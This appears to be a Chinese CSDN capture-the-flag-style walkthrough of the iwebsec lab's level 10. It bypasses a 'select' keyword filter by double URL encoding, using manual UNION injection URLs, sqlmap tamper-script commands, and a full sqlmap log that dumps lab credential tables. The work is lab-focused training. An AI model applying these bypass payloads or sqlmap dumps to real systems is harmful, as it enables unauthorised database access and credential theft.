系列文章目录
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记8- 大小写过滤注入_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过_mooyuan的博客-CSDN博客
目录
系列文章目录
前言
一、源码分析
二、url二次编码
1.那么啥是二次编码呢?
2.本关卡如何利用二次编码使用select呢
3.遇到单引号如何处理
(1)爆数据库
(2)爆表名
(3)爆字段名
二、sqlmap注入
1.注入命令
方法1(url二次编码法):
方法2(十六进制编码法):
方法3(get_magic_quotes_gpc()未开启时):
2.完整交互
总结
前言
打开靶场,url为 http://192.168.71.151/sqli/10.php?id=1 如下所示
一、源码分析
如下所示,SQL语句与前几关一样,调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入,并且对参数id做了select关键字过滤,以及对id进行了url解码处理。
select关键字过滤与url解码的相关源码如下所示
if(isset($_GET['id'])){
if (preg_match('/select/', $_GET["id"])) {
die("ERROR");
}else{
$id = urldecode($_GET['id']);
$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
}
}为与第08关形成对比,下面时08关仅仅做select关键字处理的源码
if(isset($_GET['id'])){
if (preg_match('/select/', $_GET["id"])) {
die("ERROR");
}else{
$id=$_GET['id'];
$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
}
}这里要强调一下,相对于第08关的select关键字过滤,这里只是多了一层url解码。而本关卡的名称为双重url解码,这是因为默认情况下传入参数已经被url解码一次,而源码中新增的$id = urldecode($_GET['id']); 语句则是第二次url解码。看起来源码是对输入的参数进行了二次解码,防止关键字被绕过过滤。
二、url二次编码
看了源码分析后,我们了解到程序对二次编码绕过做了防范。
1.那么啥是二次编码呢?
假如我们传入双重url编码的字符串,将绕过非法字符检测,然后经urldecode解码,带入数据库中执行,导致SQL注入漏洞存在。
高版本PHP缺省设置magicquotesgpc为打开,这样一切get,post,cookie中的’,’’,\,null都将被特殊处理为\’,\’’,\,\0,可以防范大多数字符串SQL注入。。
举个例子:
'(单引号) 进行url编码后为%27
%27再次进行url编码后为%2527
如果我们使用二次编码技术将单引号'编码为%25%27,当服务器收到参数双重编码%2527时,完整的处理流程为
双重编码%2527->第一次解码成为%27(因为%25URL解码就是%),然后经过magicquotesgpc过滤时不做处理(即单引号不会变为\')->二次解码%27->'(单引号),从而绕开了PHP缺省的过滤机制。
2.本关卡如何利用二次编码使用select呢
源码分析过程中,我们得知select关键字被过滤,那么我们可以将select进行二次url编码
由于原文是select完整关键字过滤,那么我们只需将select中的第三个字母l进行url编码
l的url编码为%6c
%6c的url编码为%25%36%63
那么select可以替换为se%25%36%63ect
于是将渗透爆破获取数据库的注入语句
http://192.168.71.151/sqli/10.php?id=1 and 1=2 union select 1,2,database()
中关键字select替换为se%25%36%63ect,
可以成功渗透注入语句变为
http://192.168.71.151/sqli/10.php?id=1 and 1=2 union se%25%36%63ect 1,2,database()
3.遇到单引号如何处理
当magicquotesgpc未打开时,无需考虑此场景,其实iwebsec 靶场漏洞库 就没有开启这个功能,也就是说单引号和双引号等特殊字符不会被特殊处理。在这个关卡中,没有
试想当magicquotesgpc打开时,单引号’,双引号’’,\,null都将被特殊处理为\’,\’’,\,\0,可以防范大多数字符串SQL注入。这种时候如何处理呢?这也是下一个关卡11关要考虑处理的内容。
下面开始手工注入(假设magicquotesgpc打开)
因为iwebsec的靶场环境并没有打开,故而需要修改docker中sqli/10.php的源码,手动添加此功能
(1)爆数据库
http://192.168.71.151/sqli/10.php?id=1 and 1=2 union se%25%36%63ect 1,2,database()
如上图获取得到数据库名为iwebsec
(2)爆表名
失败注入命令如下,因为将上一步爆出的数据库iwebsec加上了单引号,导致注入失败:
http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'
渗透方法1:将'iwebsec'替换为database()
http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
渗透方法2:将'iwebsec'替换为%2527iwebsec%2527
http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema=%2527iwebsec%2527
这里iwebsec数据库有四个表格sqli,user,users,xss
(3)爆字段名
比如说想获取到users的字段名,那么注入命令如下
http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
但是这种语句因为get_magic_quotes_gpc()和addshalshes()函数的处理会报错
绕过的方法是使用%2527users%2527代替users
http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(column_name) from information_schema.columns where table_name=%2527users%2527
二、sqlmap注入
根据上文,总结出绕过渗透的方法:
(1)使用se%25%36%63ect代替select
(2)使用%2527代替单引号
1.注入命令
方法1(url二次编码法):
使用sqlmap的绕waf脚本--tamper chardoubleencode.py,将select、单引号等内容进行二次编码即可绕过,这个方法正好点题(双重url编码绕过)
sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper chardoubleencode.py 方法2(十六进制编码法):
参考第11关卡,可以使用16进制字编码来绕过
sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper hex2char.py方法3(get_magic_quotes_gpc()未开启时):
这里要强调一下, 由于iwebsec的靶场环境没有开启 get_magic_quotes_gpc(),这时候就无需考虑单引号等字符被转义,只需要考虑select关键字被过滤掉,所以当前没有更改代码的情况下,使用第08关和09关的方法也可以渗透成功
sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper double_ljn09.py
sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper randomcase.py2.完整交互
这里为了将chardoubleencode.py的作用完整显示出来,附上-v 3的完整交互信息,根据结果可知所有的字符串均进行了url二次编码,如下所示
kali@kali:/usr/share/sqlmap/tamper$ sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper chardoubleencode.py -v 3
___
__H__
___ ___[(]_____ ___ ___ {1.5.11#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:36:13 /2022-11-25/
[02:36:13] [DEBUG] cleaning up configuration parameters
[02:36:13] [INFO] loading tamper module 'chardoubleencode'
[02:36:13] [DEBUG] setting the HTTP timeout
[02:36:13] [DEBUG] setting the HTTP User-Agent header
[02:36:13] [DEBUG] creating HTTP requests opener object
[02:36:13] [INFO] resuming back-end DBMS 'mysql'
[02:36:13] [INFO] testing connection to the target URL
[02:36:13] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8669=8669) THEN 1 ELSE (SELECT 1609 UNION SELECT 1652) END))
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2671 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(2671=2671,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 3194 FROM (SELECT(SLEEP(5)))NdTE)
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7178716271,0x737763636a6d4b595172494d63426767587648716c634d4558445341545941656d62644f46726646,0x7162627171)-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[02:36:13] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:36:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[02:36:13] [INFO] fetching current database
[02:36:13] [DEBUG] resuming configuration option 'string' ('age')
[02:36:13] [DEBUG] performed 0 queries in 0.00 seconds
current database: 'iwebsec'
[02:36:13] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[02:36:13] [INFO] fetching current database
[02:36:13] [INFO] fetching tables for database: 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2554%2541%2542%254C%2545%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%2520%2549%254E%2520%2528%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%2529%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.07 seconds
[02:36:13] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2533%2537%2531%2536%2563%2536%2539%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[02:36:13] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2565%256D%2561%2569%256C%252C%2569%2564%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2573%2571%256C%2569%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.05 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
[02:36:13] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[02:36:13] [INFO] fetching columns for table 'user' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2535%2537%2533%2536%2535%2537%2532%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'user' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2569%2564%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2560%2575%2573%2565%2572%2560%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.05 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[02:36:13] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[02:36:13] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2538%2537%2533%2537%2533%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2569%2564%252C%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2578%2573%2573%252D%252D%2520%252D
[02:36:13] [DEBUG] turning off reflection removal mechanism (for optimization purposes)
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 1 | iwebsec |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+
[02:36:13] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[02:36:13] [INFO] fetching columns for table 'users' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2535%2537%2533%2536%2535%2537%2532%2537%2533%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'users' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2572%256F%256C%2565%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2575%2573%2565%2572%2573%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.01 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+
[02:36:13] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[02:36:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[02:36:13] [WARNING] your sqlmap version is outdated
[*] ending @ 02:36:13 /2022-11-25/
总结
SQL注入主要分析几个内容
(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合
(2)注入类别是什么?这部分是普通的报错型注入
(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码
了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
![[NCTF2019]SQLi](https://img-blog.csdnimg.cn/c9a891c04626421998e8330691045826.png)
![[附源码]计算机毕业设计springboot公共台账管理系统](https://img-blog.csdnimg.cn/fd30e088d06a4f53bffe09dd2323e858.png)
